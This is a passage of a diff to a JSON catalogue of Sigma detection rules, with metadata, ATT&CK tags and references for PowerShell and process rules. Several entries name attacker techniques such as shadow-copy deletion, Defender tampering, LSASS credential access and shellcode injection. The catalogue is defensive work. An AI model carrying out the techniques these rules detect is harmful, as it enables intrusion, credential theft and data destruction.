"https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1573" - ] - }, - "uuid": "195626f3-5f1b-4403-93b7-e6cfd4d6a078", - "value": "Suspicious SSL Connection" - 
}, - { - "description": "Powershell use PassThru option to start in background", - "meta": { - "author": "frack113", - "creation_date": "2022/01/15", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_start_process.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_safeboot.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.001" ] }, - "uuid": "0718cd72-f316-4aa2-988f-838ea8533277", - "value": "Suspicious Start-Process PassThru" + "uuid": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "value": "Add SafeBoot Keys Via Reg Utility" }, { - "description": "Remove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", "meta": { - "author": "frack113", - "creation_date": "2022/02/01", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", + "creation_date": "2022/04/28", "falsepositive": [ - "Legitimate PowerShell scripts" + "Legitimate installation of a new screensaver" ], - "filename": "posh_ps_susp_unblock_file.yml", + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", 
"logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ] - }, - "uuid": "5947497f-1aa4-41dd-9693-c9848d58727d", - "value": "Suspicious Unblock-File" - }, - { - "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_wallpaper.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_wallpaper.yml" - ], - "tags": [ - "attack.impact", - "attack.t1491.001" - ] - }, - "uuid": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", - "value": "Replace Desktop Wallpaper by Powershell" - }, - { - "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", - "meta": { - "author": "frack113", - "creation_date": "2021/08/23", - "falsepositive": [ - "Admin script" - ], - "filename": "posh_ps_susp_win32_pnpentity.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ 
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_pnpentity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1120" - ] - }, - "uuid": "b26647de-4feb-4283-af6b-6117661283c5", - "value": "Powershell Suspicious Win32_PnPEntity" - }, - { - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "meta": { - "author": "frack113", - "creation_date": "2021/12/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_win32_shadowcopy.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "value": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script" - }, - { - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", - "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" - ], - "tags": [ - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", - "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" - }, - { - "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", - "meta": { - "author": "frack113", - "creation_date": "2021/10/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_windowstyle.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_windowstyle.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.003" - ] - }, - "uuid": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", - "value": "Suspicious PowerShell WindowStyle Option" - }, - { - "description": "Detects usage of the \"Write-EventLog\" cmdlet with 
'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/16", - "falsepositive": [ - "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" - ], - "filename": "posh_ps_susp_write_eventlog.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.blackhillsinfosec.com/windows-event-logs-for-red-teams/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_write_eventlog.yml" + "https://lolbas-project.github.io/lolbas/Libraries/Desk/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml" ], "tags": [ + "attack.t1218.011", "attack.defense_evasion" ] }, - "uuid": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", - "value": "PowerShell Write-EventLog Usage" + "uuid": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", + "value": "Rundll32 InstallScreenSaver Execution" }, { - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", "meta": { "author": "frack113", - "creation_date": "2021/07/20", + "creation_date": "2021/07/13", "falsepositive": [ "Unknown" ], - "filename": "posh_ps_susp_zip_compress.yml", + "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", "level": "medium", - "logsource.category": "ps_script", + "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" - ], - "tags": [ - "attack.collection", - "attack.t1074.001" - ] - }, - "uuid": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", - "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script" - }, - { - "description": "Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, OSCD Community", - "creation_date": "2020/10/05", - "falsepositive": [ - "App-V clients" - ], - "filename": "posh_ps_syncappvpublishingserver_exe.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_syncappvpublishingserver_exe.yml" + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ "attack.defense_evasion", "attack.t1218" ] }, - "uuid": "dddfebae-c46f-439c-af7a-fdb6bde90218", - "value": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction" + "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" }, { - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of 
windows defender atp or set default actions to allow.", - "meta": { - "author": "frack113, elhoim", - "creation_date": "2022/01/16", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_tamper_defender.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", - "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "value": "Tamper Windows Defender - ScriptBlockLogging" - }, - { - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/05", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender_remove_mppreference.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "ae2bdd58-0681-48ac-be7f-58ab4e593458", - "value": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging" - }, - { - "description": "Adversaries may communicate using a protocol and port paring that are typically not associated.\nFor 
example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/23", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_test_netconnection.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", - "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1571" - ] - }, - "uuid": "adf876b3-f1f8-4aa9-a4e4-a64106feec06", - "value": "Testing Usage of Uncommonly Used Port" - }, - { - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/08/03", - "falsepositive": [ - "Legitimate admin script" - ], - "filename": "posh_ps_timestomp.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", - "https://www.offensive-security.com/metasploit-unleashed/timestomp/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.006" - ] - }, - "uuid": 
"c6438007-e081-42ce-9483-b067fbef33c3", - "value": "Powershell Timestomp" - }, - { - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", - "meta": { - "author": "frack113", - "creation_date": "2021/08/18", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_trigger_profiles.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_trigger_profiles.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" - ] - }, - "uuid": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "value": "Powershell Trigger Profiles by Add_Content" - }, - { - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "meta": { - "author": "frack113", - "creation_date": "2022/01/07", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_upload.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", - "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1020" - ] - }, - "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "value": "Windows PowerShell Upload Web Request" - }, - { - "description": "Detects usage of the Get-ADUser cmdlet to collect user information and 
output it to a file", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/11/17", - "falsepositive": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" - ], - "filename": "posh_ps_user_discovery_get_aduser.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1033" - ] - }, - "uuid": "c2993223-6da8-4b1a-88ee-668b8bf315e9", - "value": "User Discovery And Export Via Get-ADUser Cmdlet - PowerShell" - }, - { - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/17", - "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ] - }, - "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS" - }, - { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", - "meta": { - "author": "James Pemberton / @4A616D6573", - "creation_date": "2019/10/24", - "falsepositive": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
- ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", - "value": "Usage Of Web Request Commands And Cmdlets - PowerShell" - }, - { - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "meta": { - "author": "frack113", - "creation_date": "2022/04/24", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_win32_product_install_msi.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ] - }, - "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", - "value": "PowerShell WMI Win32_Product Install MSI" - }, - { - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/10/12", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_windows_firewall_profile_disabled.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", 
- "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", - "http://woshub.com/manage-windows-firewall-powershell/", - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ] - }, - "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", - "value": "Windows Firewall Profile Disabled" - }, - { - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. 
Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_winlogon_helper_dll.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ] - }, - "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", - "value": "Winlogon Helper DLL" - }, - { - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_win_defender_exclusions_added.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" - ] - }, - "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "value": "Windows Defender Exclusions Added - PowerShell" - }, - { - "description": "Detects parameters used by WMImplant", - "meta": { - "author": "NVISO", - "creation_date": "2020/03/26", - "falsepositive": [ - "Administrative scripts that use the same keywords." 
- ], - "filename": "posh_ps_wmimplant.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/FortyNorthSecurity/WMImplant", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ] - }, - "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "value": "WMImplant Hack Tool" - }, - { - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "meta": { - "author": "frack113", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_wmi_persistence.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" - ] - }, - "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", - "value": "Powershell WMI Persistence" - }, - { - "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/06/20", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_wmi_unquoted_service_search.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - 
"https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ] - }, - "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", - "value": "WMIC Unquoted Services Path Lookup - PowerShell" - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/19", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_xml_iex.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", - "value": "Powershell XML Execute Command" - }, - { - "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2022/03/11", - "falsepositive": [ - "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well" - ], - "filename": 
"process_access_win_shellcode_inject_msf_empire.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", - "value": "Shellcode Injection" - }, - { - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "meta": { - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", - "creation_date": "2022/06/29", - "falsepositive": [ - "Unknown" - ], - "filename": "process_access_win_susp_seclogon.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1541920424635912196", - "https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", - "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ] - }, - "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "value": "Suspicious LSASS Access Via MalSecLogon" - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "meta": { - "author": "Nik Seetharaman", - "creation_date": "2018/07/16", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "filename": "proc_access_win_cmstp_execution_by_access.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - 
"https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" - ] - }, - "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "value": "CMSTP Execution Process Access" - }, - { - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/04", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", - "level": "high", - "logsource.category": "process_access", - "logsource.product": "windows", - "refs": [ - "https://github.com/boku7/injectAmsiBypass", - "https://github.com/boku7/spawn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", - "value": "CobaltStrike BOF Injection Pattern" - }, - { - "description": "Detects processes requesting access to LSASS 